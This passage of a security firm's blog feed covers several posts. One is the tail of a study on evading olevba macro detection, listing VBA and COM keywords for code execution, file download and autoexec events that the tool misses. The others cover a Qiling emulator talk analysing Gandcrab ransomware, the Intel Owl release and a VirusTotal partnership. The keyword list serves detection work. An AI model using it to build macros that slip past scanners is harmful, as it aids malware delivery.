/website/static/52b39fef0359aff139b034199a3e680a/807a0/AdvancedVBAmacros27.png 1652w&quot;
        sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;6.Suggestions for improvement&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;In order to detect the techniques proposed through olevba / mraptor, it would be important to note the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;There are plenty of ways to obfuscate the code and it doesn&apos;t seem worth detecting them all through a static approach&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Although it is always important to take advantage of the attacker&apos;s mistakes, we think that the strength of a static analysis is to be able to detect all the keywords that cannot be obfuscated.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;None of the tools analyzed detects the CLSID, even if dealing with strings it is particularly easy to obfuscate them.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;There is a lot of room for improving the detection of Win32 Windows API.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;This is the list of all the non-obfuscable keywords identified during our tests that olevba is unable to detect&lt;/strong&gt;&lt;/em&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Filesystem interaction and UNC downloading functions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/shell/folder-copyhere&quot;&gt;CopyHere&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/shell/folder-movehere&quot;&gt;MoveHere&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/office/vba/language/reference/user-interface-help/copyfolder-method&quot;&gt;CopyFolder&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/office/vba/language/reference/user-interface-help/movefile-method&quot;&gt;MoveFile&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/office/vba/language/reference/user-interface-help/movefolder-method&quot;&gt;MoveFolder&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/office/vba/language/reference/user-interface-help/getobject-function&quot;&gt;GetObject&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Expand environment variables:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/windows-scripting/dy8116cf%28v%3dvs.84%29&quot;&gt;ExpandEnvironmentStrings&lt;/a&gt; Wscript.Shell method&lt;/li&gt;
&lt;li&gt;Using &lt;a href=&quot;https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/windows-scripting/6s7w15a0(v=vs.84)&quot;&gt;Environment&lt;/a&gt; Wscript.Shell method&lt;/li&gt;
&lt;li&gt;Calling an ExecQuery on  &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/win32-environment&quot;&gt;Win32_Environment&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Functions and methods to perform code execution:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/create-method-in-class-win32-process&quot;&gt;Create&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/shell/invokeverbex&quot;&gt;InvokeVerb&lt;/a&gt; and InvokeVerbEx&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/shell/folderitemverb-doit&quot;&gt;DoIt&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/shell/shell-controlpanelitem&quot;&gt;ControlPanelItem&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/office/vba/office-mac/applescripttask&quot;&gt;AppleScriptTask&lt;/a&gt; # OSX&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Autoexec sub events:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/office/vba/api/word.document.contentcontrolonenter&quot;&gt;Document_ContentControlOnEnter&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/office/vba/api/excel.worksheet.followhyperlink&quot;&gt;Worksheet_FollowHyperlink&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/office/vba/api/excel.worksheet.calculate(even)&quot;&gt;Worksheet_Calculate&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The previous list was proposed on the public project through the following pull request: &lt;a href=&quot;https://github.com/decalage2/oletools/pull/591&quot;&gt;https://github.com/decalage2/oletools/pull/591&lt;/a&gt;&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;7.Conclusions&lt;/strong&gt;&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;We have shown that digging in the documentation and with a little fuzzing it is possible to craft a 0 hit macro.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Chaining these samples with an unknown sandbox detection check and esoteric COM objects could have really unpleasant effects.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Implementing an open-source out-of-the-box solution may not be enough to defend your infrastructure&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;It is very important to carry out periodic internal tests on all the detection components of your platform.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Performing periodic internal tests on all the detection components of the platform could significantly increase the detection capacity of your platform.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;&lt;strong&gt;8.About the author&lt;/strong&gt;&lt;/h1&gt;
&lt;h4&gt;Gabriele Pippi, Threat Research Lead Engineer &lt;a href=&quot;https://twitter.com/gabriele_pippi&quot;&gt;Twitter&lt;/a&gt;&lt;/h4&gt;</content:encoded></item><item><title><![CDATA[Certego research at the HITB Security Conference]]></title><description><![CDATA[Some of us are active members of the Honeynet Project and have contributed to some famous open source tools like Cuckoo Sandbox or Thug]]></description><link>https://www.certego.net/blog/blog-hitb-conference/</link><guid isPermaLink="false">blog-hitb-conference</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Malware]]></category><dc:creator><![CDATA[Certego Research Team]]></dc:creator><pubDate>Sun, 10 May 2020 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Certego has always promoted and supported Open Source Development culture. Some of us are active members of the Honeynet Project and have contributed to some famous open source tools like Cuckoo Sandbox or Thug.&lt;/p&gt;
&lt;p&gt;With the goal to help the security community to fight cyber threats, we have released two new projects this year: Intel Owl to aid cyber threat intelligence operations and Pcapoptikon2 to help analysts with writing IDS signatures.&lt;/p&gt;
&lt;p&gt;Meanwhile we have been focusing our research on finding new ways to analyze complex malware. Our own Simone Berni has been working on the development of a new open source tool and just recently, also thanks to his work, its first 1.0 version was released: Qiling, an advanced binary emulation framework.&lt;/p&gt;
&lt;p&gt;On the 25th April 2020, Simone had the opportunity to show the results of his work at the famous Hack In The Box Security Conference together with the Qiling creator, Lau Kai Jern.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;HITB Conference: Technical details&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Qiling is an advanced binary emulation framework that supports Windows, MacOS, Linux and BSD.&lt;/p&gt;
&lt;p&gt;Written in Python and based on Unicorn Engine, Qiling is designed to provide high level APIs and fine-grain instrumentation, allowing you to place hooks at every level.&lt;/p&gt;
&lt;p&gt;Certego chose to help the development of Qiling with Simone Berni&apos;s work.&lt;/p&gt;
&lt;p&gt;During his presentation, Simone showed how it is possible to use Qiling as a sandbox to analyze arbitrary malware.&lt;/p&gt;
&lt;p&gt;In particular, he prepared two different demo scenarios: Al-khaser and Gandcrab.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;Al-Khaser Demo&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1372px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/e0f4a6e87c968c6f86e2c87c0f23c8c7/b79a5/HITBconference1.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 57.29166666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAABYlAAAWJQFJUiTwAAABrElEQVR42o2PPU/CUBSGC4aCHUD5kPJRWtpCov4EEkkkkgo4qMRE/4MLMOCoiYuDdda4uhhlJC7+FhRFiBRDKL20FOqhOhAlxidvz3177jnn3osdX1bFm8eTq2pBrBTFSumiUhInAl84v/ule4hF8e7w7Pb0+gHrdNr1Rqv2/FJ/fXuqN55fGjVwrfZHV5aR+lPKt+n1Jx5T5E6z2ZIkqSNJbeB9AqzdbhcpSt9EASPLEBFCiplU1YFhGBhCfSj+quj1epqmjUZjfTQCadoQfqFOVVXNRNf14XD4ZcZjA9N1DaHBYDD5oB+yMLJcPlpPpTLZXCaTFYRNYCOdFgRhzSSZTEJMJBKYMcUYppnktrZwu8NPBpf8JMjt9jpdCzabzWKxYNPMbM7n93x+kuPjfCwOMUIzoHmCsNvtOI7PmVit1tnNu7t5j3eJ42MMy9FRlqajwRBFBkJkIEgzrNfrA2PD8T+afSzLR1mOijBhig6FqUiEoRlI8LDldnsIgpjdvL29s7jogVImyoHgnGCYgmf/6837Bwdw0vLKKsfF4PIwhSQDTpfL4XAQU3wCNySBHSeZCVoAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;JSNemucod1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/e0f4a6e87c968c6f86e2c87c0f23c8c7/b79a5/HITBconference1.png&quot;
        srcset=&quot;/website/static/e0f4a6e87c968c6f86e2c87c0f23c8c7/804b2/HITBconference1.png 384w,
/website/static/e0f4a6e87c968c6f86e2c87c0f23c8c7/e5715/HITBconference1.png 768w,
/website/static/e0f4a6e87c968c6f86e2c87c0f23c8c7/b79a5/HITBconference1.png 1372w&quot;
        sizes=&quot;(max-width: 1372px) 100vw, 1372px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The first scenario is a POC malware application that aims to stress an anti-malware system by checking if the sandbox is fortified and stealthy enough.&lt;/p&gt;
&lt;p&gt;During the emulation of Al-khaser, it is possible to understand two things mainly: how stealthy Qiling is and how much it is easy to use. Not everything of Al-khaser has been emulated, Simone implemented only the debugger detection task.&lt;/p&gt;
&lt;p&gt;Moreover, Qiling does not pass every single test made by Al-khaser (it passes 85% of checks) but the developers are working on them even right now.&lt;/p&gt;
&lt;p&gt;The second point of this demonstration is to understand how we can use Qiling to perform a deep analysis: for example, the emulation of the function that prints the output had an issue: thanks to the API offered by Qiling, Simone was able to replace this function entirely with just 3 lines of code, thus obtaining the expected outputs.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;Al-Khaser Demo&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1408px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/aa82bb58c38e756d4acd8fe551ec0082/67a79/HITBconference2.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 55.729166666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAABYlAAAWJQFJUiTwAAABzUlEQVR42n1Py27TQBQdTGhlaB524tfYHj/ipAH+IJ8QiaY0Ugtsi/gCNuxQy55dpELVNmnpmhUbvoA/YIdUqYiMY6t2oFHJo5wGVapEy9GZo6u5954zQ16+/fh66xN0fePw+eYlL+v1jQ//8sWbw7VXO5+/fCW9kB8d//h2dPydxzxOeZT0ohMeQxNonP6Kk2sYnfwcno3I6SDiPOS8F0f9MOT9fhhF/Rgn5DjD4fD8ZpDfZ6dJkg4GgyRNZkgnk8l4PB6NRjMdT6fnN5FMr2Ayw98axlcvrwV58vTZykprefnx6uraUrP5aKmJutFo1Ov1VquF8P8927KZomqSVNQNmi9IBUnO5fKieJcQIsvy7u5et9vtdCD7e53O1gXevd/ebrfb+wcHpPbgoeP5sAgqVYOalsWoacvFkiAImcwdXBRLCnxLioqAQkFCQDaXhzWllATVmm0zSi3PD3TdUBQNc6Iooo3lSnWRMTeoLJqWbTsuc1y4a7qBAcYYqdbuM+aYpuWXAySA+MW9hQUs385kPL+MlueV8Sj9gtQwTLijZZomKQcVuGLHcT1VRaym6TSbzd4ShLm5edfzdcNkjoc0VTPQQyHJRXQppX8Anv5YxBx5v4sAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;JSNemucod1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/aa82bb58c38e756d4acd8fe551ec0082/67a79/HITBconference2.png&quot;
        srcset=&quot;/website/static/aa82bb58c38e756d4acd8fe551ec0082/804b2/HITBconference2.png 384w,
/website/static/aa82bb58c38e756d4acd8fe551ec0082/e5715/HITBconference2.png 768w,
/website/static/aa82bb58c38e756d4acd8fe551ec0082/67a79/HITBconference2.png 1408w&quot;
        sizes=&quot;(max-width: 1408px) 100vw, 1408px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Here, we are talking about a famous ransomware, which is very interesting because it uses different sandbox evasion techniques before executing itself.&lt;/p&gt;
&lt;p&gt;The demo of Gandcrab shows how powerful Qiling can be when used as a sandbox. Simone, during his work, implemented the concept of &quot;Profiles&quot;, later extended by the Qiling team, and the core feature to analyze malware.&lt;/p&gt;
&lt;p&gt;The profile is just a configuration file that describes everything about the emulation: it started as a simple file containing only the Windows version that Qiling has to emulate; later, it was extended to contain information about the Volumes, Drives, Permissions and Network configuration. Now it is possible to have a profile for every OS (Linux, BSD e MacOS are supported), and it is even possible to change the emulation parameters from this config file.&lt;/p&gt;
&lt;p&gt;Simone demonstrated how much information it is possible to retrieve thanks to Qiling during the analysis of a ransomware like Grandcrab: every registry accessed is stored, every &quot;printf&quot; is saved (so it is possible to retrieve memory that has been copied from one place to another), every syscall and kernel call is stashed for future analysis. With a little bit more details, he explained how Gandcrab tries to retrieve every piece of information about the victim machine and how the malware stores the stolen information.&lt;/p&gt;
&lt;p&gt;At the end of the demo, Simone shows how it is possible to change the Profile to change the behaviour of Gandcrab.&lt;/p&gt;
&lt;p&gt;For example, you can change its permissions: when Gandcrab is executed as a user, it will spawn a shell to re-execute itself as administrator.&lt;/p&gt;
&lt;p&gt;Another strange behaviour Simone discovered can be observed when you apply a russian keyboard layout in Qiling. Again, this is possible to do so by simply adding a registry key and the desired value to the profile. When executed in an environment that has a russian keyboard, Gandcrab would kill itself.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;Conclusions&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Qiling is a powerful tool, continuously developed and improved every single day: in the future it will be a common framework that malware analysts have to be familiar with.&lt;/p&gt;
&lt;p&gt;Certego will continue to contribute to this project to improve the chances of everyone in fighting malware.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Intel Owl 1.0.0 released]]></title><description><![CDATA[The Open Source Intelligence, or OSINT solution to get threat intelligence data about a specific file, an IP or a domain from a single API]]></description><link>https://www.certego.net/blog/blog-iltel10/</link><guid isPermaLink="false">blog-iltel10</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><pubDate>Mon, 06 Apr 2020 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://github.com/intelowlproject/IntelOwl&quot;&gt;&lt;strong&gt;Intel Owl&lt;/strong&gt;&lt;/a&gt;is an &lt;strong&gt;Open Source Intelligence, or OSINT solution&lt;/strong&gt; to get threat intelligence data about a specific file, an IP or a domain from a single API at scale. It integrates a number of analyzers available online and is for everyone who needs a single point to query for info about a specific file or observable.
Born at the start of 2020 ,&lt;a href=&quot;https://www.certego.net/en/news/new-year-new-tool-intel-owl/&quot;&gt;(announcement)&lt;/a&gt;this fresh and new tool was accepted as part of the Google Summer of Code under the hat of The Honeynet Project. Great improvements have been developed since the start of this project.
Now, thanks to the ongoing collaboration with Google Summer of Code and The Honeynet Project, we are excited to announce release 1.0.0, with a completely new and revamped web interface and some new features in our API to help you better manage your threat intelligence data.
You can read some more details about Intel Owl 1.0.0 in the &lt;a href=&quot;https://www.honeynet.org/2020/07/05/intel-owl-release-v1-0-0/&quot;&gt;official release announcement&lt;/a&gt;, co-authored by Eshaan Bansal (GSoC Student) and his mentor, our own &lt;a href=&quot;https://twitter.com/matte_lodi&quot;&gt;Matteo Lodi&lt;/a&gt;, and published on The Honeynet Project&apos;s blog.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Certego joins the community of contributors to VirusTotal]]></title><description><![CDATA[Certego  joined VirusTotal, the biggest aggregator of antivirus engines and website scanners]]></description><link>https://www.certego.net/blog/blog-virustotal/</link><guid isPermaLink="false">blog-virustotal</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Malware]]></category><dc:creator><![CDATA[Matteo Lodi]]></dc:creator><pubDate>Mon, 06 Apr 2020 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;We are proud to announce that Certego has joined the community of Contributors to VirusTotal, the biggest aggregator of antivirus engines and website scanners.&lt;/p&gt;
&lt;p&gt;VirusTotal is a free service that everyone can use to check for virus or threats in a file, URL, domain or IP address by leveraging more than 70 antivirus scanners, blacklisting services and analysis tools provided by the global security vendors. Founded in 2004 by a Spanish company, VirusTotal was acquired by Google in 2012 and, in 2018, the ownership switched to Chronicle, a subsidiary of Alphabet.&lt;/p&gt;
&lt;p&gt;Starting from this week, most of the intelligence data generated by Quokka, the Threat Intelligence Platform developed by Certego, is available to the VirusTotal community.&lt;/p&gt;
&lt;p&gt;The Quokka platform was designed by a team of experienced malware analysts with passion and a strong commitment. The Threat Intelligence Team has mixed different tools, including Honeypots, real “traps” for the cyber criminals, and Sandboxes, virtual environments where it is possible to execute and study malware automatically and at scale. The result is a platform that enables Certego to gather relevant information in real time to track cyber criminal activities.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;Additional technical details&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;We would like to show some examples of what kind of information users can find by leveraging together the power of VirusTotal multi scan engine and the Certego Intelligence information.&lt;/p&gt;
&lt;p&gt;You could be a tech guy or not. In both cases, it surely happened that you found a strange link inside a suspicious email you received and you wanted to verify it before clicking it. One way could be to go to the VirusTotal website, select the URL scan, insert the suspicious link in the input bar and ask for an analysis.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1414px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/fe5324b21f5dbea3521c111b908a5e06/0c3d0/virustotal1.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 64.32291666666666%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAIAAAAmMtkJAAAACXBIWXMAABYlAAAWJQFJUiTwAAABOklEQVR42n2RW0vDQBCF+///guC7z76pVCxeiqBChVIEQaS3kF7MZZPNZmbHs7tNMantx2Qzmd2zc7LbE4+1bpwv5fVdZkvRWjIlZSmqkLxwOUJX0qH3V/w1lcsrGX/Iy0j693I3dPH8JtcDuX2UwbCrb4mjWCafst66T+ZdIMcksdT1bllXvMeYQqkM5LkLpfIsS3OMaWqM+d/2Hq3NdvsDkiRJQZImHqTM9h+x9TSvo4RJ2+DEzKzRzhjXzXvTlSNUYBiJL1RlWc5nM5gIFeiduPYYD1Gtq3oRURTzdF4somoRcbymsCZsGnInxsNtiAjmVFGfnV/c9IewhxIfcEzsJiB+eBqNJ9/kLoxPidGN/EBNE9Txa0TmYPO2GGRptopXG7De4IIbO9avaRHOqNsZJaJW89NYa38BF5v1zz+pnjMAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;JSNemucod1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/fe5324b21f5dbea3521c111b908a5e06/0c3d0/virustotal1.png&quot;
        srcset=&quot;/website/static/fe5324b21f5dbea3521c111b908a5e06/804b2/virustotal1.png 384w,
/website/static/fe5324b21f5dbea3521c111b908a5e06/e5715/virustotal1.png 768w,
/website/static/fe5324b21f5dbea3521c111b908a5e06/0c3d0/virustotal1.png 1414w&quot;
        sizes=&quot;(max-width: 1414px) 100vw, 1414px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;After some seconds, you would find the results of the analysis.
For this specific example, the Certego engine detected the URL as containing “Phishing”.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1414px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/a4375b1f4566827658c674d70c37033e/0c3d0/virustotal2.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 61.19791666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAIAAADtbgqsAAAACXBIWXMAABYlAAAWJQFJUiTwAAABKElEQVR42o1S7XICIQzk/R+z7VTbnqcQAuEj0EVOW7XTceFHcpdNsgnm5b0TC7mBEGPrfbtPwORS6HNhoiRJLCXyydG4UdIDRH4+5pyN80QfX6flUHIulvJyLOupOqo511uUCyYZhtFS97udI8Lv5bAerS219r+AgEkjIgiEa1QSW0cStEHpkNqfhqlaOZDEAEHxnM8zT+MfFBxUFqmvb3a3Z0/Rew/ldl2ZfLnFZVr56g7NaJNDYk6q57ZrVc+93MsGkzyhzSG+qY/ctBk4IWBTDpuCXZpa9qp6R4YQzAl1B7mrY9Kqg4yNRZFJKK0GiY9jQww2gvqzMsewVcakkBW58bKKVh8YWX+/pHN3I0abjpi2xZjZUgjhWnnqeWwbQ9oW3hqBrPoNkazAGnRUoDAAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;JSNemucod1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/a4375b1f4566827658c674d70c37033e/0c3d0/virustotal2.png&quot;
        srcset=&quot;/website/static/a4375b1f4566827658c674d70c37033e/804b2/virustotal2.png 384w,
/website/static/a4375b1f4566827658c674d70c37033e/e5715/virustotal2.png 768w,
/website/static/a4375b1f4566827658c674d70c37033e/0c3d0/virustotal2.png 1414w&quot;
        sizes=&quot;(max-width: 1414px) 100vw, 1414px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;This evaluation helps the end user because, if he had visited the site, he would have found an Outlook account phishing page identical to the real one.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1410px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/1260a08035f880186633615a8d91347d/45662/virustotal3.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 69.01041666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAIAAACgpqunAAAACXBIWXMAABYlAAAWJQFJUiTwAAADRElEQVR42mO4cvUaEF24dOn8xYs3b9168PDBg4cPHz56CCRBDDAbiB49AjFBgg8e3H/w4N6DB3fvP2BIKypLLyrNKC7Pq6gqq62taWhsaGlt6eho7ezo6Ors7u3p7++fPHni1KmTJkzs7+rtae3sbGhrq2lqLa9vYsgpzs8rySuuKCyvLqmpK6tvqGhuru5or+/pburvbZk0oWPa5L6ZM2bMmDlz+tRJ0yZ2T+zvAJvQ1NpWz5CbGpaXGlqcGVGRG1VTEFtfHNdSlthZnTqxIXNyY+bU1pxpvZXTp00A6Z/WNbOvYmZ3yfSOwsktef2NOQxBno7BnvaR/s7xwS6pER7pkZ6poS7ZkS4ZYfY95fHzOvIW9BbNn1Q1va9sWmva1IbEKbUJEytje0uj2gvDGewsTZxsTL2cLf3drP3dbMK87XISgxvKcooy4ia0li+Y0ja7v3Hx1KY5E2qWTa6eUpdenxlQmxlYkeZflODDoK+roamupKQoq6GmaKyvZaCpNKGn/f+/rz9/ffv16/efP0D05+/fv39+//7///+iuVMdTJRDPKx8HI2dLHUYFOSlJSRExcSEpaVEtNXklGVFWhpqPn15/+jRve/fv/+Hgd9gzbOmTVCV4TfSVlBTklCUE2MA6hQREQRqlhQXVFGQkBHlqa8uBdoJjNBPHz/8/PEDqOffv/9AESBj2pQJCpL8eupyKgriivKSDCIiwvz8PIKCPPx8HFJivIK8zGUlBUB17z99effx88fPX4B2/vv39/fvX0DByRP7pMQFtNTkgZpVFCUZhIV4ODiY+XnZhAQ4xEW5BXkYSoqygeo+ffvx7cev7z9/ATW++/z97vP3QMH+3k5+XnagmyVEOAUFOBmkJfkE+NmBmsVFOESFuZgYGIrys4DqgIEEIoEu/v9/85V3mStuH3ryf8bkTnFhBnVlQTlpTmEhdgY5GX5ZSU4xEQ5ZSQ41JR4xYYagAOf1a5evXL5gw/qFm9Yv2rh+8fYti7dvXrh/z/rSwnADbSYDXT49LR4tNW4GTVWgH7jUlLnVVLh1tbi11Lk0VNkUZRllJRnVlBh11Jl0NZiNtJkNtBi1VBk0VFgNdfmM9Hh0NLgNtHkBt3uMpeZxup4AAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;JSNemucod1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/1260a08035f880186633615a8d91347d/45662/virustotal3.png&quot;
        srcset=&quot;/website/static/1260a08035f880186633615a8d91347d/804b2/virustotal3.png 384w,
/website/static/1260a08035f880186633615a8d91347d/e5715/virustotal3.png 768w,
/website/static/1260a08035f880186633615a8d91347d/45662/virustotal3.png 1410w&quot;
        sizes=&quot;(max-width: 1410px) 100vw, 1410px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
